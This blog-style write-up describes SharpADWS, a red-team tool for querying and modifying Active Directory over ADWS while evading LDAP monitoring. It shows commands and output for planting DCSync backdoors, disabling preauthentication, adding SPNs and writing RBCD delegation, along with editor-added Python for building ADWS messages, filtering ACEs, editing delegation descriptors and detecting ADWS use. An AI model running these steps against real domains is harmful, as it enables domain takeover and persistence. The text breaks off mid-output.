SharpADWS - Abusing the ADWS Protocol to Enumerate Active Directory

admin, 2024-05-03 19:52:55

Overview

SharpADWS is an Active Directory reconnaissance and exploitation tool built for red teams. It collects and modifies Active Directory data over the Active Directory Web Services (ADWS) protocol rather than over LDAP.

Active Directory is normally enumerated or modified over LDAP. SharpADWS can read and write directory data without ever talking to the LDAP server directly. Under ADWS, the LDAP query is wrapped in a series of SOAP messages and sent to the ADWS service over a WCF NetTcpBinding channel, which is encrypted. The ADWS service then unwraps the LDAP query locally and forwards it to the LDAP server running on the same domain controller.

ADWS is installed and started automatically when the Active Directory Domain Services (AD DS) role is installed (Windows Server 2008 R2 and later), so SharpADWS works in practically every domain environment without any additional setup.

Advantages

One of the main benefits of using ADWS for LDAP post-exploitation is that it is relatively unknown: because no LDAP traffic crosses the network, the activity is not easily picked up by the tools that commonly monitor LDAP. ADWS is a service entirely separate from LDAP, listens on TCP port 9389 and exposes a SOAP interface.

While researching ADWS we noticed that, because it is a SOAP web service, the LDAP query itself is executed locally on the domain controller. This has several interesting side effects that turn out to be useful. For example, when you examine the LDAP query logs on a domain controller, you will see that the queries originate from 127.0.0.1, and in many environments such loopback queries are simply ignored.

A second benefit is that the activity does not show up in the DeviceEvents table (Microsoft Defender for Endpoint advanced hunting) under the LdapSearch action type, so very little telemetry is available. What remains observable on the domain controller is the inbound TCP 9389 connection accepted by the ADWS service and the local LDAP searches it issues.
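The evasion described above is only partial: the ADWS service still has to accept a TCP 9389 connection, and the LDAP search still happens on the DC, just from 127.0.0.1. The following added example (not from the original post or from SharpADWS) shows one way to attribute loopback LDAP searches to the remote ADWS client by correlating two DC-side sources: Directory Service event 1644 records (expensive/inefficient LDAP search logging, which must be enabled through the "15 Field Engineering" diagnostic level and the search-time thresholds) and Sysmon event 3 network connections accepted by the ADWS process. The log records are constructed samples with simplified field names chosen for this example; real events must be parsed out of EVTX/XML first.

```python
"""Attribute loopback (127.0.0.1) LDAP searches on a DC to the remote ADWS client.

Added example, not part of the original post or of SharpADWS. Log records are
constructed samples; the field names are the editor's own simplification.
"""
from datetime import datetime, timedelta

ADWS_IMAGE = r"C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe"
ADWS_PORT = 9389

# Constructed sample: Sysmon event 3 (network connection) records seen on the DC.
SAMPLE_CONNECTIONS = [
    # ADWS accepted a client connection on 9389 (Initiated=false)
    {"time": "2024-02-13T19:40:02", "image": ADWS_IMAGE, "initiated": False,
     "dst_port": ADWS_PORT, "src_ip": "10.10.20.55"},
    # unrelated: plain LDAP from another host, handled by lsass
    {"time": "2024-02-13T19:41:10", "image": r"C:\Windows\System32\lsass.exe",
     "initiated": False, "dst_port": 389, "src_ip": "10.10.20.9"},
]

# Constructed sample: event 1644 style LDAP search records on the same DC.
SAMPLE_SEARCHES = [
    {"time": "2024-02-13T19:40:05", "client": "127.0.0.1:49712",
     "base": "DC=corp,DC=local", "filter": "(servicePrincipalName=*)"},
    {"time": "2024-02-13T19:40:06", "client": "127.0.0.1:49712",
     "base": "DC=corp,DC=local",
     "filter": "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"},
    {"time": "2024-02-13T19:55:00", "client": "10.10.20.9:51000",
     "base": "CN=Users,DC=corp,DC=local", "filter": "(sAMAccountName=svc_backup)"},
]


def _t(s):
    return datetime.fromisoformat(s)


def adws_sessions(connections):
    """Inbound connections accepted by the ADWS process on TCP 9389, i.e. ADWS clients."""
    return [c for c in connections
            if c["image"].lower() == ADWS_IMAGE.lower()
            and not c["initiated"] and c["dst_port"] == ADWS_PORT]


def attribute_local_searches(searches, connections, window=timedelta(minutes=10)):
    """For every LDAP search issued from 127.0.0.1, list the ADWS client IPs that
    connected within `window` before the search. Loopback searches with no
    matching ADWS session are still returned (empty candidate list) so that
    they are reviewed rather than silently dropped."""
    sessions = adws_sessions(connections)
    out = []
    for s in searches:
        if not s["client"].startswith("127.0.0.1:"):
            continue  # a remote LDAP client; ordinary LDAP monitoring covers it
        when = _t(s["time"])
        candidates = sorted({c["src_ip"] for c in sessions
                             if timedelta(0) <= when - _t(c["time"]) <= window})
        out.append({"time": s["time"], "filter": s["filter"],
                    "via_adws_from": candidates})
    return out


if __name__ == "__main__":
    for hit in attribute_local_searches(SAMPLE_SEARCHES, SAMPLE_CONNECTIONS):
        print(hit)
```

The correlation is a heuristic (a long-lived ADWS session and several clients can overlap), but it turns "a query from 127.0.0.1" into "a query most likely issued through ADWS from 10.10.20.55", which is the piece of context the page says defenders usually lack.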

Protocol Implementation

SharpADWS implements the relevant parts of the MS-ADDM, MS-WSTIM and MS-WSDS protocol specifications. With the project's source code you can easily perform the following operations against Active Directory Web Services (Enumerate, Pull, Renew, GetStatus and Release are the WS-Enumeration operations defined in MS-WSDS; Delete, Get, Put and Create are the WS-Transfer operations defined in MS-WSTIM):

  • Enumerate: creates an enumeration context bound to the given search query filter.
  • Pull: retrieves result objects from a given enumeration context.
  • Renew: extends the expiry time of a given enumeration context.
  • GetStatus: returns the expiry time of a given enumeration context.
  • Release: releases a given enumeration context.
  • Delete: deletes an existing object.
  • Get: retrieves one or more attributes of an object.
  • Put: modifies the contents of one or more attributes on an object.
    • Add: adds the given values to the value set of the given attribute; the attribute is created if it does not yet exist on the target object.
    • Replace: replaces the value set of the given attribute with the values given in the operation; the attribute is created if it does not yet exist on the target object. If no values are given, all current values of the attribute are removed.
    • Delete: removes the given values from the given attribute. If no values are given, all values are removed. If the attribute does not exist on the target object, the Put request fails.
  • Create: creates a new object.
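To make the "LDAP query wrapped in SOAP" point concrete, here is an added example (not SharpADWS code, which is C#) that builds the Enumerate and Pull messages of the WS-Enumeration flow in Python and parses a Pull response. The namespace URIs, the Enumeration endpoint path and the `ad:instance` header are taken from MS-WSDS / MS-ADDM as the editor understands them and should be checked against the specifications; the Pull response is a constructed sample, and no network connection is made (a real client also needs the NetTcpBinding framing and authentication layers, which are out of scope here).

```python
"""Build ADWS WS-Enumeration messages and parse a Pull response.

Added example, not SharpADWS code. Namespaces/endpoint follow MS-WSDS and
MS-ADDM as recalled by the editor (verify against the specs). No I/O.
"""
import xml.etree.ElementTree as ET

SOAP = "http://www.w3.org/2003/05/soap-envelope"
WSA = "http://www.w3.org/2005/08/addressing"
WSEN = "http://schemas.xmlsoap.org/ws/2004/09/enumeration"
AD = "http://schemas.microsoft.com/2008/1/ActiveDirectory"
ADLQ = "http://schemas.microsoft.com/2008/1/ActiveDirectory/Dialect/LdapQuery"
XPATH1 = "http://schemas.microsoft.com/2008/1/ActiveDirectory/Dialect/XPath-Level-1"
ADDATA = "http://schemas.microsoft.com/2008/1/ActiveDirectory/Data"
ENUM_ENDPOINT = "net.tcp://{host}:9389/ActiveDirectoryWebServices/Windows/Enumeration"

NS = {"s": SOAP, "a": WSA, "wsen": WSEN, "ad": AD, "adlq": ADLQ, "addata": ADDATA}
for _p, _u in NS.items():
    ET.register_namespace(_p, _u)


def envelope(action, to):
    """SOAP 1.2 envelope with the WS-Addressing headers ADWS expects."""
    env = ET.Element(f"{{{SOAP}}}Envelope")
    env.set("xmlns:addata", ADDATA)  # prefix used inside SelectionProperty text
    hdr = ET.SubElement(env, f"{{{SOAP}}}Header")
    ET.SubElement(hdr, f"{{{WSA}}}Action", {f"{{{SOAP}}}mustUnderstand": "1"}).text = action
    ET.SubElement(hdr, f"{{{WSA}}}To", {f"{{{SOAP}}}mustUnderstand": "1"}).text = to
    ET.SubElement(hdr, f"{{{AD}}}instance").text = "ldap:389"  # directory instance (MS-ADDM)
    return env, ET.SubElement(env, f"{{{SOAP}}}Body")


def enumerate_request(host, base_dn, ldap_filter, attributes, scope="subtree"):
    """Enumerate: the LDAP search (filter, base, scope, attribute list) wrapped in SOAP."""
    env, body = envelope(f"{WSEN}/Enumerate", ENUM_ENDPOINT.format(host=host))
    enum = ET.SubElement(body, f"{{{WSEN}}}Enumerate")
    flt = ET.SubElement(enum, f"{{{WSEN}}}Filter", {"Dialect": ADLQ})
    q = ET.SubElement(flt, f"{{{ADLQ}}}LdapQuery")
    ET.SubElement(q, f"{{{ADLQ}}}Filter").text = ldap_filter
    ET.SubElement(q, f"{{{ADLQ}}}BaseObject").text = base_dn
    ET.SubElement(q, f"{{{ADLQ}}}Scope").text = scope
    sel = ET.SubElement(enum, f"{{{AD}}}Selection", {"Dialect": XPATH1})
    for attr in attributes:
        ET.SubElement(sel, f"{{{AD}}}SelectionProperty").text = f"addata:{attr}"
    return ET.tostring(env, encoding="unicode")


def pull_request(host, context, max_elements=256):
    """Pull: fetch up to max_elements objects from an existing enumeration context."""
    env, body = envelope(f"{WSEN}/Pull", ENUM_ENDPOINT.format(host=host))
    pull = ET.SubElement(body, f"{{{WSEN}}}Pull")
    ET.SubElement(pull, f"{{{WSEN}}}EnumerationContext").text = context
    ET.SubElement(pull, f"{{{WSEN}}}MaxElements").text = str(max_elements)
    return ET.tostring(env, encoding="unicode")


def parse_pull_response(xml_text):
    """Return {DN: {attribute: [values]}} from the addata:* objects in a PullResponse."""
    root = ET.fromstring(xml_text)
    results = {}
    for obj in root.findall(".//wsen:Items/*", NS):
        dn = obj.findtext("ad:distinguishedName/ad:value", namespaces=NS)
        attrs = {}
        for child in obj:
            if child.tag.startswith(f"{{{ADDATA}}}"):
                name = child.tag.split("}", 1)[1]
                attrs[name] = [v.text for v in child.findall("ad:value", NS)]
        results[dn] = attrs
    return results


# Constructed sample of what a Pull response carries (one user object).
SAMPLE_PULL_RESPONSE = f"""<s:Envelope xmlns:s="{SOAP}" xmlns:wsen="{WSEN}"
    xmlns:ad="{AD}" xmlns:addata="{ADDATA}"><s:Body><wsen:PullResponse>
  <wsen:Items><addata:user>
    <ad:distinguishedName><ad:value>CN=Bob,CN=Users,DC=corp,DC=local</ad:value></ad:distinguishedName>
    <addata:sAMAccountName><ad:value>Bob</ad:value></addata:sAMAccountName>
    <addata:servicePrincipalName><ad:value>WWW/win-iisserver.corp.local/IIS</ad:value>
      <ad:value>TERMSERV/win-iisserver.corp.local</ad:value></addata:servicePrincipalName>
  </addata:user></wsen:Items><wsen:EndOfSequence/>
</wsen:PullResponse></s:Body></s:Envelope>"""

if __name__ == "__main__":
    print(enumerate_request("dc01.corp.local", "DC=corp,DC=local",
                            "(servicePrincipalName=*)", ["sAMAccountName", "servicePrincipalName"]))
    print(parse_pull_response(SAMPLE_PULL_RESPONSE))
```

Notice that the LDAP filter string travels unchanged inside the XML: the DC-side LDAP server still sees a normal search, which is why the 127.0.0.1 log entries mentioned above look like ordinary local queries.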

Usage

The -h command-line switch prints the following usage information:

C:\Users\Marcus>SharpADWS.exe -h

SharpADWS 1.0.0-beta - Copyright (c) 2024 WHOAMI (whoamianony.top)

  -h                      Display this help screen

Connection options:
  -d                      Specify domain for enumeration
  -u                      Username to use for ADWS Connection
  -p                      Password to use for ADWS Connection

Supported methods:
  Cache                   Dump all object Sids to cache file for Acl methods
  Acl                     Enumerate and analyze DACLs for specified objects, specifically Users, Computers, Groups, Domains, DomainControllers and GPOs
  DCSync                  Enumerate all DCSync-capable accounts and can set DCSync backdoors
  DontReqPreAuth          Enumerates all accounts that do not require kerberos preauthentication, and can enable this option for accounts
  Kerberoastable          Enumerates all Kerberoastable accounts, and can write SPNs for accounts
  AddComputer             Add a machine account within the scope of ms-DS-MachineAccountQuota for RBCD attack
  RBCD                    Read, write and remove msDS-AllowedToActOnBehalfOfOtherIdentity attributes for Resource-Based Constrained Delegation attack
  Certify                 Enumerate all ADCS data like Certify.exe, and can write template attributes
  Whisker                 List, add and remove msDS-KeyCredentialLink attribute like Whisker.exe for ShadowCredentials attack
  FindDelegation          Enumerate all delegation relationships for the target domain

Acl options:
  -dn                     RFC 2253 DN to base search from
  -scope                  Set your Scope, support Base (Default), Onelevel, Subtree
  -trustee                The sAMAccountName of a security principal to check for its effective permissions
  -right                  Filter DACL for a specific AD rights
  -rid                    Specify a rid value and filter out DACL that security principal's rid is greater than it
  -user                   Enumerate DACL for all user objects
  -computer               Enumerate DACL for all computer objects
  -group                  Enumerate DACL for all group objects
  -domain                 Enumerate DACL for all domain objects
  -domaincontroller       Enumerate DACL for all domain controller objects
  -gpo                    Enumerate DACL for all gpo objects

DCSync options:
  -action [{list, write}] Action to operate on DCSync method
          list            List all accounts with DCSync permissions
          write           Escalate accounts with DCSync permissions
  -target                 Specify the sAMAccountName of the account

DontReqPreAuth options:
  -action [{list, write}] Action to operate on DontReqPreAuth method
          list            List all accounts that do not require kerberos preauthentication
          write           Enable do not require kerberos preauthentication for an account
  -target                 Specify the sAMAccountName of the account

Kerberoastable options:
  -action [{list, write}] Action to operate on Kerberoastable method
          list            List all kerberoastable accounts
          write           Write SPNs for an account to kerberoast
  -target                 Specify the sAMAccountName of the account

AddComputer options:
  -computer-name          Name of computer to add, without '$' suffix
  -computer-pass          Password to set for the computer

RBCD options:
  -action [{read,write,remove}]
                          Action to operate on RBCD method
          read            Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account
          write           Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account
          remove          Remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute value of the account added by the write action

Certify options:
  -action [{find, modify}]
                          Action to operate on Certify method
          find            Find all CA and certificate templates
          modify          Modify certificate templates
  -enrolleeSuppliesSubject
                          Enumerate certificate templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for find action,
                          and can enable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for modify action
  -clientAuth             Enumerate certificate templates with client authentication pKIExtendedKeyUsage for find action,
                          and can enable Client Authentication for modify action

Whisker options:
  -action [{list, add, remove}]
                          Action to operate on ShadowCredentials method
          list            List all the values of the msDS-KeyCredentialLink attribute for an account
          add             Add a new value to the msDS-KeyCredentialLink attribute for an account
          remove          Remove a value from the msDS-KeyCredentialLink attribute for an account
  -device-id              Specify the DeviceID to remove
  -target                 Specify the sAMAccountName of the account

FindDelegation options:
  No options, just run!

Cache

When enumerating ACLs, SharpADWS does not want to issue an extra ADWS request for every unknown trustee it encounters. The Cache method therefore builds a complete cache of all account objects up front and saves it to a file, which avoids a large amount of (unnecessary) traffic. The cache maps the name of every account object in the current domain to its objectSid.

C:\Users\Marcus>SharpADWS.exe Cache

[*] Cache file has been generated: object.cache

Acl

The Acl method enumerates the DACL of the object(s) under the DN given with -dn and can filter the resulting ACEs with the -trustee, -right and -rid parameters. For example, to enumerate all Domain Controller objects and keep only the ACEs whose trustee is Marcus:

C:\Users\Marcus>SharpADWS.exe acl -dn "OU=Domain Controllers,DC=corp,DC=local" -scope Subtree -trustee Marcus

Severity: Critical
ObjectDN: CN=DC01,OU=Domain Controllers,DC=corp,DC=local
AccessControlType: Allow
ActiveDirectoryRights: ListChildren, ReadProperty, GenericWrite
ObjectType: All
Trustee: Marcus
IsInherited: False

Or, to enumerate all User objects and keep only ACEs whose rights match Generic (here GenericWrite) and whose trustee has a RID greater than 1000, which excludes built-in and default principals such as Domain Admins:

C:\Users\Marcus>SharpADWS.exe acl -dn "CN=Users,DC=corp,DC=local" -scope Subtree -right Generic -rid 1000

Severity: Critical
ObjectDN: CN=Bob,CN=Users,DC=corp,DC=local
AccessControlType: Allow
ActiveDirectoryRights: ListChildren, ReadProperty, GenericWrite
ObjectType: All
Trustee: Marcus
IsInherited: False

The Acl method also provides shortcuts for enumerating specific object classes:

SharpADWS.exe acl -user                # Enumerate DACL for all user objects
SharpADWS.exe acl -computer            # Enumerate DACL for all computer objects
SharpADWS.exe acl -group               # Enumerate DACL for all group objects
SharpADWS.exe acl -domain              # Enumerate DACL for all domain objects
SharpADWS.exe acl -domaincontroller    # Enumerate DACL for all domain controller objects
SharpADWS.exe acl -gpo                 # Enumerate DACL for all gpo objects

Note that the Acl method depends on the name-to-SID cache created beforehand with the Cache method.

DCSync

The list action of the DCSync method finds every account that has been granted the DS-Replication-Get-Changes, DS-Replication-Get-Changes-All or DS-Replication-Get-Changes-In-Filtered-Set extended right on the domain object. Administrators and Domain Controllers hold these rights by default and are reported as Info; a trustee outside the defaults, such as Alice below, is reported as Critical. Keep in mind that replicating secrets (DCSync proper) requires both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, so an account holding only one of the rights is a lead to investigate, not yet a working DCSync account:

C:\Users\Marcus>SharpADWS.exe DCSync -action list

Severity: Info
ObjectDN: DC=corp,DC=local
AccessControlType: Allow
ActiveDirectoryRights: ExtendedRight
ObjectType: DS-Replication-Get-Changes-All
Trustee: Administrators
IsInherited: False

Severity: Info
ObjectDN: DC=corp,DC=local
AccessControlType: Allow
ActiveDirectoryRights: ExtendedRight
ObjectType: DS-Replication-Get-Changes-All
Trustee: Domain Controllers
IsInherited: False

Severity: Critical
ObjectDN: DC=corp,DC=local
AccessControlType: Allow
ActiveDirectoryRights: ExtendedRight
ObjectType: DS-Replication-Get-Changes-All
Trustee: Alice
IsInherited: False

Note that the list action of the DCSync method depends on the cache created beforehand with the Cache method.

With sufficient rights (WriteDacl on the domain object), the write action grants an account DCSync rights, which makes a durable domain persistence backdoor:

C:\Users\Marcus>SharpADWS.exe DCSync -action write -target Marcus

[*] Account Marcus now has DCSync privileges on the domain.
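The Cache, Acl and DCSync sections above describe the same pipeline: resolve trustee SIDs through a local cache, then filter ACEs by trustee, right and RID, or by the replication extended rights. The added example below (not SharpADWS code) reproduces that logic on constructed ACE records and a constructed SID cache, and adds the check a practitioner wants on the DCSync output: a trustee is only DCSync-capable if it holds both Get-Changes and Get-Changes-All on the domain head, or an equivalent blanket grant (GenericAll, or ExtendedRight without an object type restriction). The extended-right GUIDs are the well-known schema values; the domain SID and ACEs are invented for the example.

```python
"""Filter ACEs like the Acl/DCSync methods and decide who can really DCSync.

Added example, not SharpADWS code. The SID cache and ACE records are
constructed samples; SharpADWS builds the cache from objectSid values pulled
over ADWS and reads ACEs from each object's nTSecurityDescriptor.
"""
from dataclasses import dataclass

# Extended-right GUIDs from the AD schema (controlAccessRight rightsGuid).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPL_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DS_REPL_GET_CHANGES_FILTERED}
DCSYNC_NEEDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# Constructed cache (objectSid -> name); the domain SID is invented.
DOMAIN_SID = "S-1-5-21-1315326963-2851134370-1073178800"
SID_CACHE = {
    "S-1-5-32-544": "Administrators",
    f"{DOMAIN_SID}-512": "Domain Admins",
    f"{DOMAIN_SID}-516": "Domain Controllers",
    f"{DOMAIN_SID}-1104": "Marcus",
    f"{DOMAIN_SID}-1105": "Alice",
}


@dataclass
class Ace:
    object_dn: str
    access_type: str      # "Allow" / "Deny"
    rights: str           # comma-separated ActiveDirectoryRights names
    object_type: str      # extended-right / attribute GUID, or "All"
    trustee_sid: str
    inherited: bool = False


def rid(sid):
    """Last sub-authority of an SID; RIDs below 1000 are built-in/default principals."""
    return int(sid.rsplit("-", 1)[1])


def trustee_name(sid, cache=SID_CACHE):
    """Resolve through the cache; unknown SIDs are shown raw instead of triggering a lookup."""
    return cache.get(sid, sid)


def filter_aces(aces, trustee=None, right=None, min_rid=None, cache=SID_CACHE):
    """Mimic -trustee / -right / -rid: keep Allow ACEs that satisfy every given filter."""
    keep = []
    for a in aces:
        if a.access_type != "Allow":
            continue
        if trustee and trustee_name(a.trustee_sid, cache).lower() != trustee.lower():
            continue
        if right and right.lower() not in a.rights.lower():
            continue  # substring match, so "Generic" covers GenericWrite and GenericAll
        if min_rid is not None and rid(a.trustee_sid) <= min_rid:
            continue
        keep.append(a)
    return keep


def dcsync_capable(aces, domain_dn, cache=SID_CACHE):
    """Names of trustees that can replicate secrets from the domain head."""
    held = {}
    for a in aces:
        if a.object_dn != domain_dn or a.access_type != "Allow":
            continue
        r = a.rights.lower()
        if "genericall" in r or ("extendedright" in r and a.object_type == "All"):
            held.setdefault(a.trustee_sid, set()).update(REPL_RIGHTS)   # blanket grant
        elif a.object_type.lower() in REPL_RIGHTS:
            held.setdefault(a.trustee_sid, set()).add(a.object_type.lower())
    return sorted(trustee_name(sid, cache) for sid, rights in held.items()
                  if DCSYNC_NEEDS <= rights)


# Constructed ACEs modelled on the outputs shown above.
SAMPLE_ACES = [
    Ace("DC=corp,DC=local", "Allow", "ExtendedRight", DS_REPL_GET_CHANGES, "S-1-5-32-544"),
    Ace("DC=corp,DC=local", "Allow", "ExtendedRight", DS_REPL_GET_CHANGES_ALL, "S-1-5-32-544"),
    Ace("DC=corp,DC=local", "Allow", "ExtendedRight", DS_REPL_GET_CHANGES, f"{DOMAIN_SID}-1105"),
    Ace("DC=corp,DC=local", "Allow", "ExtendedRight", DS_REPL_GET_CHANGES_ALL, f"{DOMAIN_SID}-1105"),
    Ace("DC=corp,DC=local", "Allow", "ExtendedRight", DS_REPL_GET_CHANGES_FILTERED, f"{DOMAIN_SID}-1104"),
    Ace("CN=Bob,CN=Users,DC=corp,DC=local", "Allow", "ListChildren, ReadProperty, GenericWrite", "All", f"{DOMAIN_SID}-1104"),
    Ace("CN=Bob,CN=Users,DC=corp,DC=local", "Allow", "GenericAll", "All", f"{DOMAIN_SID}-512"),
]

if __name__ == "__main__":
    for a in filter_aces(SAMPLE_ACES, right="Generic", min_rid=1000):
        print(a.object_dn, a.rights, trustee_name(a.trustee_sid))
    print("DCSync-capable:", dcsync_capable(SAMPLE_ACES, "DC=corp,DC=local"))
```

Marcus holds only DS-Replication-Get-Changes-In-Filtered-Set in this sample and is therefore not listed as DCSync-capable, while his GenericWrite on Bob survives the `-right Generic -rid 1000` filter exactly as in the Acl output above.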

DontReqPreAuth

The list action of the DontReqPreAuth method finds every account with the "Do not require Kerberos preauthentication" option set:

C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action list

[*] Found users that do not require kerberos preauthentication:
[*]     CN=Bob,CN=Users,DC=corp,DC=local
[*]     CN=Alice,CN=Users,DC=corp,DC=local
[*]     CN=John,CN=Users,DC=corp,DC=local

If you hold WriteProperty on a target account's userAccountControl attribute, you can abuse it with the write action to set the "Do not require Kerberos preauthentication" option on that account and then AS-REP Roast it:

C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action write -target Administrator

[*] Set DontReqPreAuth for user Administrator successfully!

Kerberoastable

The list action of the Kerberoastable method finds every account that has a servicePrincipalName set. Note that krbtgt appears in the output below because it carries the kadmin/changepw SPN, but it is disabled and its password is randomly generated, so its tickets are not realistically crackable:

C:\Users\Marcus>SharpADWS.exe Kerberoastable -action list

[*] Found kerberoastable users:
[*]     CN=krbtgt,CN=Users,DC=corp,DC=local
[*]         kadmin/changepw
[*]     CN=Bob,CN=Users,DC=corp,DC=local
[*]         WWW/win-iisserver.corp.local/IIS
[*]         TERMSERV/win-iisserver.corp.local
[*]     CN=John,CN=Users,DC=corp,DC=local
[*]         TERMSERV/WIN-SERVER2026

If you hold WriteProperty on a target account's servicePrincipalName attribute, you can abuse it with the write action to add an SPN to that account (user accounts only) and then Kerberoast it:

C:\Users\Marcus>SharpADWS.exe Kerberoastable -action write -target Administrator

[*] Kerberoast user Administrator successfully!

AddComputer

The AddComputer method creates a new computer account within the limit set by the ms-DS-MachineAccountQuota attribute (10 per user by default). The new machine account can then be used in an RBCD attack.

C:\Users\Marcus>SharpADWS.exe AddComputer -computer-name PENTEST$ -computer-pass Passw0rd

[*] Successfully added machine account PENTEST$ with password Passw0rd.

RBCD

The read action of the RBCD method reads the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the given account to show which principals are allowed to delegate to it, i.e. to impersonate users to that account:

C:\Users\Marcus>SharpADWS.exe RBCD -action read -delegate-to DC01$

[*] Accounts allowed to act on behalf of other identity:
[*]     WIN-IISSERVER$   (S-1-5-21-1315326963-2851134370-1073178800-1106)
[*]     WIN-MSSQL$       (S-1-5-21-1315326963-2851134370-1073178800-1103)
[*]     WIN-PC8087$      (S-1-5-21-1315326963-2851134370-1073178800-1117)

The write action writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the target account to set up a Resource-Based Constrained Delegation attack. Below, having first created the machine account PENTEST$ with the AddComputer method, we write the SID of PENTEST$ into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DC01$ (the -delegate-to and -delegate-from parameters used here are not listed in the -h output above):

C:\Users\Marcus>SharpADWS.exe RBCD -action write -delegate-to DC01$ -delegate-from PENTEST$

[*] Delegation rights modified successfully!
[*] PENTEST$ can now impersonate users on DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     PENTEST$   (S-1-5-21-1315326963-2851134370-1073178800-1113)

The remove action removes the SID added by write from the target object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute:

C:\Users\Marcus>SharpADWS.exe RBCD -action remove -delegate-to DC01$ -delegate-from PENTEST$

[*] Delegation rights modified successfully!
[*] Accounts allowed to act on behalf of other identity has been removed:
[*]     PENTEST$   (S-1-5-21-1315326963-2851134370-1073178800-1113)
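msDS-AllowedToActOnBehalfOfOtherIdentity is a security descriptor, so "read" means listing the SIDs in its Allow ACEs, "write" means appending an ACE and "remove" means deleting only that ACE. The added example below (not SharpADWS code) performs the three operations on the descriptor's SDDL string form, which is what most tooling prints and what the Windows API (ConvertStringSecurityDescriptorToSecurityDescriptor) or Set-ADComputer turns into the binary attribute value; producing the binary form itself is outside this example. The access-mask string is the one commonly used by RBCD tooling, and the SIDs come from the output shown above. The point a practitioner should check is that write appends rather than replaces: overwriting the descriptor would silently remove legitimate delegations (WIN-IISSERVER$, WIN-MSSQL$ in the read output above) and is an obvious, noisy change.

```python
"""Read / append / remove principals in an RBCD security descriptor (SDDL form).

Added example, not SharpADWS code. Works on the SDDL string representation
of msDS-AllowedToActOnBehalfOfOtherIdentity; converting to the binary
attribute value needs the Windows API or an equivalent library.
"""
import re

# Access mask commonly written for the delegating principal's ACE.
RBCD_ACE_RIGHTS = "CCDCLCSWRPWPDTLOCRSDRCWDWO"
# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;sid) with empty GUID fields
ACE_RE = re.compile(r"\(A;;([A-Z]*);;;(S-1-5-[0-9-]+)\)")

# Constructed name -> SID mapping standing in for the Cache method's lookup.
SID_OF = {
    "WIN-IISSERVER$": "S-1-5-21-1315326963-2851134370-1073178800-1106",
    "WIN-MSSQL$": "S-1-5-21-1315326963-2851134370-1073178800-1103",
    "PENTEST$": "S-1-5-21-1315326963-2851134370-1073178800-1113",
}


def allowed_sids(sddl):
    """read: SIDs allowed to act on behalf of other identities to this account."""
    return [m.group(2) for m in ACE_RE.finditer(sddl or "")]


def add_sid(sddl, sid):
    """write: append an Allow ACE for `sid`, keeping every existing ACE. Idempotent."""
    if sid in allowed_sids(sddl):
        return sddl
    ace = f"(A;;{RBCD_ACE_RIGHTS};;;{sid})"
    return f"O:BAD:{ace}" if not sddl else sddl + ace


def remove_sid(sddl, sid):
    """remove: drop only the ACE for `sid`. An empty DACL clears the attribute."""
    if not sddl:
        return ""
    new = ACE_RE.sub(lambda m: "" if m.group(2) == sid else m.group(0), sddl)
    return new if allowed_sids(new) else ""


def add_by_name(sddl, name, cache=SID_OF):
    """Convenience wrapper mirroring `-delegate-from PENTEST$`."""
    return add_sid(sddl, cache[name])


if __name__ == "__main__":
    current = add_by_name(add_by_name("", "WIN-IISSERVER$"), "WIN-MSSQL$")
    print("before:", allowed_sids(current))
    current = add_by_name(current, "PENTEST$")
    print("after write:", allowed_sids(current))
    print("after remove:", allowed_sids(remove_sid(current, SID_OF["PENTEST$"])))
```

Defenders can apply the same parser to Directory Service change auditing (event 5136 on the attribute) to see exactly which SID was added, rather than only that the descriptor changed.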

Certify

The find action of the Certify method enumerates AD CS data the way Certify does, including all certification authorities and certificate templates:

C:\Users\Marcus>SharpADWS.exe Certify -action find

[*] Find CA and certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'

[*] Listing info about the Enterprise CA 'corp-DC01-CA'

    Enterprise CA Name            : corp-DC01-CA
    DNS Name                      : DC01.corp.local
    FullName                      : DC01.corp.local\corp-DC01-CA
    Certificate Subject           : CN=corp-DC01-CA, DC=corp, DC=local
    Certificate Serial Number     : 2D975C2D49AE4BB7432682E1708C8834
    Certificate Validity Start    : 2/13/2024 5:55:36 PM
    Certificate Validity End      : 2/13/2029 6:05:36 PM
    CA Permissions                :
      Enrollment Rights           : Authenticated Users
      Object Control Permissions  :
        ManageCA                  : Enterprise Admins, DC01, Domain Admins
        ManageCertificates        : Enterprise Admins, DC01
        WriteDacl                 : Enterprise Admins, DC01, Domain Admins
        WriteOwner                : Enterprise Admins, DC01, Domain Admins
        WriteProperty             : Enterprise Admins, DC01, Domain Admins

[*] Available Certificates Templates

    CA Name                       : CORP-DC01-CA
    Template Name                 : User
    Enabled                       : True
    Client Authentication         : True
    Enrollment Agent              : False
    Any Purpose                   : False
    Enrollee Supplies Subject     : False
    pKIExtendedKeyUsage           : Encrypting File System, Secure Email, Client Authentication
    msPKI-Certificate-Name-Flag   : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    msPkI-Enrollment-Flag         : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    msPKI-Private-Key-Flag        : EXPORTABLE_KEY
    CA Permissions                :
      Enrollment Rights           : Domain Admins, Domain Users, Enterprise Admins
      Object Control Permissions  :
